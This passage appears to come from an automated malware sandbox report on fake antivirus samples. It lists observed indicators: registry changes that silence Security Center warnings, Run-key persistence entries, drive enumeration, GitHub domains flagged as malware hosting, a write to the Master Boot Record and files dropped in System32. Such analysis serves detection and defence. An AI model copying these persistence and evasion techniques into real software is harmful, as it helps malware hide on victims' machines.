Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "0" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "1" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" \??\c:\windows\antivirus-platinum.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" C:\Users\Admin\Desktop\[email protected] N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HCGF35 = "C:\\windows\\system32\\wezuc9.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ADWCLEANER = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ANTIVIRUS PRO 2017 = "C:\\Users\\Admin\\Desktop\\[email protected]" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SOFTPROZ = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hijlbxdnsg426 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\"" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Security Central = "C:\\Program Files (x86)\\Security Central\\Security Central.exe" C:\Program Files (x86)\Security Central\Security Central.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\Desktop\\[email protected]" C:\Users\Admin\Desktop\[email protected] N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\U: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\W: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\W: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\I: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\G: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\L: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\Y: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\S: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\Desktop\[email protected] N/A
File opened (read-only) \??\R: C:\Program Files (x86)\Security Central\Security Central.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened (read-only) \??\Y: C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Users\Admin\Desktop\[email protected] N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\Desktop\[email protected] N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Desktop\[email protected] N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\netathr10x.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\SET1163.tmp C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F4D9C889B7AEBCF4E1A2DAABC5C3628A_77D782D611E65A2A81EA974847CB0C84 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\net8185.inf_amd64_7a30f5a9441cd55b\net8185.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netbc64.inf_amd64_b96cdf411c43c00c\netbc64.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_net.inf_amd64_32a9ad23c1ecc42d\c_net.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\netg664.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bthpan.inf_amd64_b06c3bc32f7db374\bthpan.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\System32\CatRoot2\dberr.txt C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbnet.inf_amd64_9e6bb7a4b7338267\usbnet.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\net8192se64.inf_amd64_167684f9283b4eca\net8192se64.PNF C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21EA03E12A6F9D076B6BC3318EA9363E_6EF0095DA824AE045AE9FC5B645DF095 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EE44ECA143B76F2B9F2A5AA75B5D1EC6_5BFB72FAE1BB9D1928D1C5C92F52E8EA C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
